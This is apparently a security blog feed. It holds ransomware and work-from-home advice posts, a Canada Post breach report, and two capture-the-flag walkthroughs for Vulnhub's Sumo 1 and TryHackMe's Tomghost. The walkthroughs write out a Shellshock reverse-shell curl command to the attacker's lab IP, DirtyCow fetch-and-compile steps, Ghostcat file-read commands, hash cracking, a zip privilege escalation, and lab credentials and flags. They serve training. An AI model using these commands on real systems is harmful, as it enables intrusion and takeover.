    In recent years ransomware attacks benefit from vulnerabilities that organizations have not noticed and with over half of vulnerabilities exploited. 63% of the CVEs analyzed were tied to high-value in which 52.6% of the ransomware vulnerabilities had a CVSS v2 score lower than 8. Targeting enterprise assets such as servers, application servers, and other critical assets allows attackers to maximize business disruption and demand higher ransom payments.

    Attackers are continuing to target organizations through the exploitation of older Microsoft Word vulnerabilities such as:

    CVE-2017-0199 :

    This CVE was first disclosed and patched in April 2017. It allows an attacker to download and execute a Visual Basic Script containing PowerShell commands after the victim opens a malicious document containing an embedded exploit.

    CVE-2017-11882:

    This CVE was first disclosed and patched in November 2017. This vulnerability involves a stack buffer overflow in the Microsoft Equation Editor component of Microsoft Office that allows for remote code execution.

    Common Weakness Enumeration (CWE):

    It is easy to find and exploit these weaknesses. They are dangerous as they will frequently allow the bad actors to completely take over the execution of software, steal data, or prevent the software from working.

    The NVD obtains vulnerability data from CVE which is 40% of CVEs linked to ransomware attacks and here are the new vulnerability disclosures that might appeal to ransomware families. Fixing these CWEs can make it harder for ransomware attackers and limit their use of critical safety patches :

    • CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
    • CWE-20: Improper Input Validation
    • CWE-264: Permissions, Privileges, and Access Controls
    • CWE-94: Improper Control of Generation of Code, or Code Injection
    • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

    End Point Threat:

    As ransomware continues to enjoy great success with employees struggle to recognize malicious emails and with the cyber skills gap, it may seem like ransomware is unstoppable. Public health and safety organizations, hospitals, and law enforcement agencies increasingly falling victim to attacks unleashed by malicious emails opened by unwitting employees. These organizations often wind up paying the ransom as they need urgent access to the compromised files.

    Defenses that account for both the determination of cybercriminals and the certainty of human error are the needs of every organization. Advanced endpoint security provides real-time analysis of file movement and behavior across a whole network, unlike antivirus protection which only identifies specific signatures. Whenever a document is opened or shared, it is analyzed against a database to determine its potential risk based on how similar files have behaved.

    Reference:

    1. DeBeck, C., co-authored by Chris Caridi, Charles DeBeck Senior Cyber Threat Intelligence Analyst – IBM Charles DeBeck is a senior cyber threat intelligence strategic analyst with, DeBeck, C., Senior Cyber Threat Intelligence Analyst – IBM, & Charles DeBeck is a senior cyber threat intelligence strategic analyst with IBM X-Force Incident Response and Intelligence Services (IRIS). Charles brings 7 … read more. (2020, February 26). What’s Old Is New, What’s New Is Old: Aged Vulnerabilities Still in Use in Attacks Today. Security Intelligence. https://securityintelligence.com/posts/whats-old-is-new-whats-new-is-old-aged-vulnerabilities-still-in-use-in-attacks-today/.

    2. Sheridan, K. (2021, February 22). 8 Ways Ransomware Operators Target Your Network. Dark Reading. https://www.darkreading.com/8-ways-ransomware-operators-target-your-network/d/did/1340221_mc=bib&itc=bib&utm_source=bib&utm_medium=bib&utm_campaign=Commentary&utm_term=Vulnerabilities+%2F+Threats&image_number=2

  • Infosec insights to the new normal

    Infosec insights to the new normal

    This pandemic is hitting hard on people and businesses around the world. While people are still struggling to overcome the situation, some businesses found ways by adopting some of the technologies that are beyond our time.

    To overcome the Global pandemic and ensuring the safety of every employee, organizations have adopted the Work from Home facility for their employees. Work from home has gone from being a once-in-a-while choice to being the new standard. Many companies have made it official that they would encourage employees to work from home permanently.

    How everything used to be

    Companies used to have a network-based perimeter to secure, around their office for their data and other IT properties.  The perimeter-based defense was the most common form of security in the past. Firewall-based security trusting the perimeter that everything within is

    safe. A connection from an external. With time and technology, attackers proved that wrong. The organization had to bring security for data in rest, data in transit, internal networks, devices, and much more.

    How everything is now

    We have come a long way from there to maintaining security for remote users and devices. Increased number of Remote users, BYOD, Cloud, etc. made the earlier modes of security ineffective. Organizations had to grant permissions to such users and devices.

    But permissions for such connections with an implicit trust to any user weakens the company’s security posture. Some of the mistakes that can cost a company more than anything while implementing security for remote users are:

    1. Not considering compromised devices
    2. Ignoring compromised credentials
    3. Not accounting for the context of an access request
    4. Creating a perception of safety

    Credits: HACKMAGEDDON

    The cyber-attacks follow an upward trend as we can see in the report made by Hackmageddon. With employees accessing official systems and files from remote networks, the organization’s attack surface has widened. Technologies today are Smart. But with human interactions, chances of new vulnerabilities are high.

    Studies say that 68% of the breaches happened, took more than months for the organizations to discover it. This emphasizes the importance of instilling cybersecurity knowledge in every employee.

    What an IT team should worry about

    • Confidentiality of your business data
    • Integrity of those data, while at rest and in transit
    • Availability of systems

    What an IT team can do

    1.Adopting Zero trust security model

    Otherwise known as perimeter-less security, is an approach to securely implement IT systems. The main concept is to trust no device by default. The three pillars of the zero-trust model are:

    • Always authenticate and authorize
    • Use least privileged access
    • Always assume there will be a breach

    2.Adjust your cyber strategy

    Analyze the business and risks by coordinating with respective teams to rethink the cybersecurity budgets and prioritize improving cyber strategy and budget.

    • Review IT security policies and processes and ensure that it is being followed.
    • Identify is the new attack surface. Improve IAM strategy with:
      • Right Controls
      • Right Reasons
      • Right Resources
    • Ensure efficient end-point security and Data security across its life cycle.
    • New security tools that can make improve cybersecurity are coming up more often than ever. Examine them.

    3.Setup Cyber training and exercises

    Cybersecurity is not just some rules for employees to follow. It is a culture that should be integrated into your workplace.

    • Show the employees what to do and what not to do.
    • Remind them the technology can do so much and chances are there when they might end up being the risk.

    4.Continuously review your infrastructure

    Ensure proper reviews are conducted periodically on the access controls, threats, and vulnerabilities across the Active Directory (AD) and systems.

    What an employee can do

    Every organization was pushed to adopt the “Work from Home” method for the safety of their employees with limited time in hand to think about the ways to implement Data security along with it. As a responsive employee, before clicking on any links shared from an unknown source, visualize a big picture of what situation you will be in if you do so.

    Some of the things you can do to ensure your data security are:

    1.Maintain a healthy password and activate MFA

    Attackers have millions of passwords that are commonly used, which might include yours as well. Make sure you have a unique healthy password that is uneasy to guess and activating MFA verifies that you are who you claim to be.

    2.Keep your system and software updated.

    Make sure to update and install patches more often. Not only for your system but also for your mobiles and non-corporate devices in which you access your emails and stuff.

    3.Secure your Wi-Fi access point

    Know that an average home network is less secure than an airport, hotel, or mobile network. Never connect your official laptop to any public Wi-Fi. Keep your firmware up to date and change your passwords and default settings to a secured one. Check out the recommendations on keeping your Wi-Fi secure by TP-Link and Lifehacker.

    4.Avoid Personal-Official data overlap

    With remote working, it is widely seen that many are mixing up both personal and office laptops. Avoid handing over the official laptop to any family or friends in any situation. Even accessing any of the social media from a business laptop might help an attacker to connect the dots and fake your identity.

    5.Be careful while sharing your screen

    In a team meeting where you share your screen, ensure that all unwanted apps are closed and no tasks other than what you need to present are running behind.

    6.Think again before you click

    Since phishing is the most popular cyber threat, check the sender’s email address whenever you receive a new email. Validate its credibility. Always access your banking profiles directly from the website, not through any links you receive. No matter who shares it.

    7.Lock your system whenever you walk away

    While taking a break, lock your system for the safety of your data. Even a glimpse of what you are doing while you have a tea or bathroom walk will help someone to use it to pose a threat. This rule was a must-be-obeyed one when you were in office and keep doing that while you are at home as well.

    Following these steps will keep you safe from the most common security risks. Just following these alone will not do though. Keep yourself up to date with the evolving cyber threats and patches releasing.

    “An internet-wide scan carried out by security researchers from Rapid7 had discovered over 11 million devices with 3389/TCP ports left open online, of which over 4.1 million are specifically speaking the RDP protocol.”

    Information security is no longer an IT team’s responsibility. You should realize that you don’t have to be in an IT or Security role to contribute to your company’s overall security.

    Be Aware.

    Take Initiate.

    Stay protected

  • Canada Post data breach exposes 950,000 customers

    A third-party supplier of Canada Post Corporation faced a major data breach giving the attacker 950,000 parcel recipients’ data. This was announced by the state-owned postal service in a press release published on the last week of May 2021.
    The actual incident happened to Commport Communication, a third-party supplier providing Electronic Data Interchange (EDI) solution on 19th May 2021, and they have reported to Canada Post as soon as they found about the breach.
    The compromised data belongs to the customers of nearly a 3-year period between July 2016 and March 2019. The Canada Post also informed the customers, including 44 large businesses, that the company had fallen victim to a malware attack.

    Exposed Data:
    For 97% of customers, it was their names and addresses.
    For the remaining 3%, it was their email address and Phone number.

    Canada Post has conducted a thorough forensic investigation and they have confirmed that no evidence of financial data being leaked was found. The company claims that they respect customers’ privacy and takes cybersecurity very seriously. Also added that they regret the difficulty caused to the customers due to the breach.

    The Next Step:
    Canada Post has proactively informed all the clients and been supporting them to carry out the necessary steps. They also informed the office of the privacy commissioner.
    As per the company, they are now closely engaging with Commport Communications and with external cybersecurity experts to fully investigate the breach and take necessary action.

  • SUMO 1 – Vulnhub Walkthrough

    This write up is about a simple vulnerable machine Sumo 1.
    It is a boot2root challenge from Vulnhub for beginners. In this vulnerable machine we must find the flag which is hidden inside.

    Also, I have used RustScan for network scanning which is a new tool and bit faster than traditional Nmap.

    Lets me explain more about it further inside!

    PTES Methodology:

    Information Gathering:

    • Netdiscover
    • RustScan

    Vulnerability Analysis:

    • Using Nikto.
    • Using dirbuster.

    Exploitation:

    • Exploiting Shellshock Vulnerability using Metasploit.
    • Gaining session using Meterpreter.

    Post Exploitation:

    • Enumerating for Privilege Escalation.

    At Last Capture the Flag 🏁

    Information Gathering:

    First let’s find out the IP address assigned to the machine. For that I am using commonly used Netdiscover tool.

    kali@kali:~$ sudo netdiscover

     

    After few seconds of scanning I discovered the IP address 192.168.70.128. To confirm it lets check the IP in the browser.

    Now I am going scan for the services running on the host 192.168.70.128 using RustScan.

    Traditionally in Penetration testing we use popular tool NMAP but recently I came through RustScan which claims to be faster than NMAP. So, I just wanted to give a try

    RustScan scanned the ports in 13.08 seconds and I got port 22 and 80 open.
    But personally, I like Nmap rather than RustScan. I didn’t get much information in Networking scanning.

    You can download RustScan from here https://github.com/RustScan/RustScan/releases

    Now let’s go the next phase

    Vulnerability Analysis

    I didn’t find much information in Networking scanning and the webpage so let’s find enumerate the directories in the Webpage.

    For this I am going to use simple DirBuster

    kali@kali:~$ dirb http://192.168.70.128

    Here I found that http://192.168.70.128/cgi-bin.

    Let’s explore if the /cgi-bin is accessible

    OOPS! That is a dead end.

    As I found /cgi-bin I checked whether it has any vulnerability or exploits.
    Now I came through ShellShock exploit which is an old vulnerability now patched.

    I tried my luck using Nikto to confirm whether it really has ShellShock vulnerability.

    kali@kali:~$ nikto -h 192.168.70.128

    I was lucky and found that the site is vulnerable for ShellShock
    Then opened it in the browser.

    I am able to access /cgi-bin/test.sh.

    To know more about shellshock, https://en.wikipedia.org/wiki/Shellshock_(software_bug)

    As now I found the host is vulnerable for ShellShock, my next step is to exploit the vulnerability.

    Exploitation:

    ShellShock is a code injection exploitable vulnerability. I am going to exploited using the tool called Metasploit.

    Here, I am going to use the easy method by using Metasploit.

    To start Metasploit in Kali type” msfconsole” in the terminal

    Use “search“ command to search for all shellshock exploits. You can also use Searchsploit in the terminal to find the exploits available

    Now we need to choose the right exploit code to exploit the vulnerable machine.

    I just used the auxiliary scanner on the target host for shellshock vulnerability.

    msf5 > use auxiliary/scanner/http/apache_mod_cgi_bash_env

    And I got the result for the scan,

    Don’t forget to set the TARGETURI path

    Let’s exploit!

    I got the meterpreter session. Now let’s explore more.

    The machine runs in older version of Ubuntu 12.04. This must be interesting as it has a linux 3.2.0

    As machine is running in Ubuntu 12.04 and the after a quick search I found it has a Local Privilege Escalation vulnerability.

    But I have only limited access

    Post Exploitation:

    Getting a reverse shell was easy in this machine

    curl -H ‘User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.70.129/9001 0>&1’ http://192.168.70.128/cgi-bin/test/test.cgi

    And I was listening to the port 9001 using Netcat

    kali@kali:~$ nc -lvnp 9001

    Here I used the famous DirtyCow exploit. Compile the exploit code using

    gcc -pthread dirty.c -o -dirty -lcrypt

    To upload the exploit, I have to go to /tmp directory and used wget to download the exploit.

    Before that I used a simple python script and hosted the exploit from local machine.

    Run Python -m SimpleHTTPServer 91 and wget the exploit.

    Now Run wget http://192.168.70.129:91:dirty.c
    Here use your IP address

    Now I have successfully uploaded the exploit code into the vulnerable machine.

    Then I compiled the exploit dirty.c inside the host but it throwed error.

    After checking google I found a simple way to change the directory path so that it gets compiled without errors.

    PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH

     

    Now the exploit is compiled and only thing I must do is open SSH.

    Boom! I gained access inside the vulnerable machine and the Flag is captured.

     

    References:

    https://www.exploit-db.com/raw/40839
    https://en.wikipedia.org/wiki/Dirty_COW
    https://www.cs.purdue.edu/homes/bb/cs348/www-S08/unix_path.html
    https://www.thegeekdiary.com/how-to-change-the-path-variable-in-linux/
    https://github.com/RustScan/RustScan
    https://www.exploit-db.com/exploits/40938/
    https://en.wikipedia.org/wiki/Shellshock_(software_bug)

  • Ghostcat Vulnerability CVE-2020-1938 explained and exploited with Try-Hack-Me Tomghost machine

    Today, I am back with an interesting blog on vulnerability named Ghostcat. The Apache Ghostcat vulnerability is an LFI (Local File Inclusion) vulnerability which is discovered by a security researcher of Chaitin Tech and came out in February 2020, while the world was gearing up for a lockdown fight up against the coronavirus. It allows an attacker to read files such as configuration files, text files, or any other tomcat directory files.

    What Ghostcat vulnerability can do?

    Due to a flaw in the Tomcat AJP protocol, by exploiting the Ghostacat vulnerability an attacker can read or include any files in the webapp directories of Tomcat. For example, An attacker can read the webapp configuration files or source code. In addition, if the target web application has a file upload function, the attacker may execute malicious code on the target host by exploiting file inclusion through Ghostcat vulnerability.

    You can get more information about it on

    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938

    https://nvd.nist.gov/vuln/detail/CVE-2020-1938

    What is AJP (Apache Jserv Protocol)?

    It is a binary protocol that can proxy inbound requests from a web server through an application server that sits behind the webserver. It is essentially an optimized binary version of the HTTP protocol in binary form. This makes communication with the AJP port rather difficult using conventional tools.

    The simplest solution is to configure Apache as a local proxy, which performs transparent conversion of HTTP traffic to AJP format. Once configured, an attacker can use common tools and different exploits to exploit the Tomcat server over AJP.

    It can be used to reduce the processing costs related to HTTP requests and is mostly used in scenarios that require clustering or reverse proxies.

    By default, it is enabled on port 8009.

    By default, Tomcat is configured with two Connectors, which are HTTP Connector and AJP Connector:

    HTTP Connector: used to process HTTP protocol requests (HTTP/1.1), and the default listening address is 0.0.0.0:8080

    AJP Connector: used to process AJP protocol requests (AJP/1.3), and the default listening address is 0.0.0.0:8009

    How Ghostcat can become RCE (Remote Code Execution)?

    As we have discussed till now that Ghostcat is a file inclusion vulnerability and It’s not a Remote Code Execution (RCE) by default. But some circumstances made it RCE.

    João Matos, a well-known security researcher from Brazil, identified the prerequisites needed for Ghostcat to become an RCE.

    Apache Tomcat has officially released versions 9.0.31, 8.5.51, and 7.0.100, and a newer version to fix this vulnerability.

    Why does this vulnerability exist?

    By default, Tomcat treats AJP connections as having a higher level of trust, when compared to HTTP connections. When AJP is implemented correctly, the protocol requires a secret, which is required by anyone who queries the protocol. When we are using the default Tomcat configuration, this secret is not enabled and because of this, there is no security check done for requests coming into port 8009. This means that an unauthenticated attacker can access the port to read or potentially write to the server.

    TryHackMe has a machine named Tomghost, which has this vulnerability. So now we will exploit that machine and learn more about this.

     Tomghost: Try-Hack-Me machine

    Our goal is to identify recent vulnerabilities and exploit the system or read files that we should not have access to.

    To start this, I have Initiated the VPN connection and deploy the machine.

    As always, we will start with Nmap scan:

    nmap -sC -sV -vv -T4 <IP>

    We found 4 open ports: Port 22, Port 53, Port 8009, Port 8080

    Task 1: Compromising this machine and obtaining user.txt

    We can see that on port 8080 we have a Tomcat webserver and port 8009 is also open.

    Let’s access its website as an Apache is running.

    Here, we can see the default page for Apache Tomcat and it is running version 9.0.30. (We got the version from our Nmap scan results as well)

    So, now we can look for vulnerabilities on google.  After some googling, I found that Apache Tomcat versions 6.x, 7.x, 8.x, and 9.x are found to be vulnerable to this Ghostcat vulnerability which we discussed earlier.

    So, we can search for exploits in google. I found following on exploit DB: https://www.exploit-db.com/exploits/48143

    I also found another exploit on the GitHub of “00theway” which looks interesting.  So, I have decided to use this here. You can find that in here:

    https://github.com/00theway/Ghostcat-CNVD-2020-10487

    We need to get this in our system using following command:

     git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487

    We can see the ajpShooter.py file in our directory.

    Following is code for ajpShooter, for readers interested in Python programming:

    Now let’s check how to use this.

    Now we want to use this to exploit and for that on 00theway’s GitHub page, we found following example:

    From this I made our command as following:

    python3 ajpShooter.py http://<IP>:<PORT> <AJP_PORT> /WEB-INF/web.xml read

    python3 ajpShooter.py http://10.10.170.107:8080 8009 /WEB-INF/web.xml read

    With the help of ajpShooter, We obtained a username and password.

    skyfuck:8730281lkjlkjdqlksalks

     From our Nmap scan results, we know that SSH is open. So let’s try to login through SSH and give this password.

    Yes…!!! We can log in successfully using that password… Now let’s find out what we have in here and we will also look for the flag.

    As you can see, We found 2 users here.

    After Switching to the merlin directory, I found the user.txt flag.

    THM{GhostCat_1s_so_cr4sy}

    So, we have successfully Compromised this machine and obtain user.txt and found our 1st flag..!!!

     Task 2:  Privilege Escalation and obtaining root:

     Switching to user ‘skyfuck’ again we found 2 files: credential.pgp and tryhackme.asc

    Here we have .pgp and .asc file. Opening .asc file gave me PGP private key shown below.

    From this and after researching on google, I learned that asc file is used to decrypt pgp.

    Before going further let’s quickly look at GPG.

    GnuPG (more commonly known as GPG) is an implementation of a standard known as PGP (Pretty Good Privacy). It uses a system of “public” and “private” keys for the encryption and signing of messages or data.

    It is a complete implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories.

    For encryption and decryption, I found the following useful:

    So, we found a credential file earlier and it was encrypted using gpg and key to decrypt that file is tryhackme.asc. Let’s try to decrypt that.

    But We need a secret to decrypt this.

    As you can see, we don’t have sudo privilege here so to decrypt this file we need to copy this to our system.

    Let’s get this file on our system utilizing the Secure Copy (scp) command.

    scp copy files securely between hosts on a network. It uses ssh for data transfer and uses the same authentication and provides the same security as ssh.

    So, we can copy these 2 files across ssh connection. That connection will be securely encrypted, it is a very secure way to copy files between computers.

    scp uses by default the port 22 and connects via an encrypted connection or secure shell connection.

    Syntax: scp [-12346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file]

        [-l limit] [-o ssh_option] [-P port] [-S program]

        [[user@]host1:]file1 … [[user@]host2:]file2

    So, I will use following command for secure copy and Password: 8730281lkjlkjdqlksalks

    scp -p skyfuck@10.10.140.34:/home/skyfuck/tryhackme.asc tryhackme.asc

    Here, -p is for Preserving modification times, access times, and modes from the original file

    We have successfully copied 1 file. Let’s do it for the other as well.

    scp -p skyfuck@10.10.140.34:/home/skyfuck/credential.pgp credential.pgp

    Now, In our TryHackMe directory we have two extra files, ‘tryhackme.asc’ and ‘credential.pgp’.
    We can use john the ripper to crack the hast discover the password in ‘tryhackme.asc’.

    John the Ripper tool will help us with revealing the password hash hidden in the tryhackme.asc file. 

    For this, we will search for gpg2john. You can use locate command.

    Here we can pass it the file we got from the Tomghost machine and save the output.
    /usr/sbin/gpg2john tryhackme.asc > tryhackmeHash.txt

    This is what my hash file contains:

    Now, To crack this, we will use john with rockyou.txt file using following command:

    john –wordlist=/usr/share/wordlists/rockyou.txt tryhackmeHash

    So, we have the passphrase: alexandru

    Now can try to decrypt the credential.pgp with this passphrase to get the content using the command discussed earlier in Table.

    gpg –import tryhackme.asc

    When it prompts for password, we can supply password: alexandru as shown below:

    We can see that it also exposes some sensitive information like it is encrypted with a 3072-bit ELG key, ID 8F3DA3DCEC6707170.

    As you can see, the process is completed, and our key is imported.

    Now let’s decrypt this using following command:

    gpg –decrypt credential.pgp

    for decryption also they will authenticate you.

    Here, I entered the wrong password by mistake and learned that it provides only 3 tries for an attacker to unlock the OpenPGP secret key.

    Hurray..!!! After giving the correct password, Our decryption is successfully completed.

    As we can see, another user merlin, and his password is also revealed. Now we can try that with ssh:

    Now we can switch to user merlin using the obtained password and check the command that can be performed with sudo privilege:

    Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus neca

    Here, we can run the zip command as root. So, I was looking for ways to use zip to get root access, on google and found  GTFOBins.

    It is a privilege escalation exploit we can utilize to elevate our privileges and get a root shell from zip.

    Here is the link:

    https://gtfobins.github.io/gtfobins/zip/#sudo

    Using the site GTFOBins, the zip application allows for a user to create a new shell as the root user.  Now we will see how to use it:

    .

    All we need to do now is simply copy and paste this command into the terminal and we should get a new command line as root.

    Let’s, give it a try.

    And finally, it’s Done. I simply change the directory to the /root and got the root.txt flag.

    THM{ZIP_1S_FAKE}

    With this second flag, we have completed this machine.

    It was a great machine as it had a recent real-world-related vulnerability. We learned a couple of new things in this blog.

    Conclusion:

    1. Started the machine and got into the same network using OpenVPN Service.
    2. We started initial recon with Nmap and found 4 open Ports. Which are 22, 53, 8009, and Port 8080. We also found what version and services they are running. That gave us information about Apache Tomcat version 9.30.30 is running on 8080 and Apache Jserv is on 8009.
    1. Looked for vulnerabilities associated with that and found well-known Ghostcat Vulnerability (CVE-2020-1938). When working with Apache Tomcat, always look for Ghostcat vulnerability.
    1. Found few ways to exploit it from exploiteDB and GitHub. Then started the exploitation phase with the Github repository of “00theway” with ajpShooter.py and got 1st user and his password.
    1. With those credentials tried to get access to the user using SSH but learned that he is not the root user. Started searching for some useful directory/information to escalate the privileges. Found out few files (.pgp and .asc), 1st flag, and another username.
    1. Stared privilege escalation to get access to the root user. Got access to PGP private key and tried to decrypt the ASCII file using that. For that securely copied both files to my system (because it was not a rooted user profile, so it required a secret phrase to decrypt the file) and crack the ASCII file using John the Ripper.
    1. Used gpg2john to get the Hash of ASCII file, and used rockyou world list with john to crack that hash. This gave the secret phrase.
    1. Using that we unlocked PGP key and got other user’s credentials. Login through SSH and found out that it was a root user.
    1. Learned that it can only run zip command as a root. Used GTFOBins to maintain elevated privilege and access the file systems and found the final flag.

    Thanks for reading…!!!

    Until Next time, Happy Hacking…!!!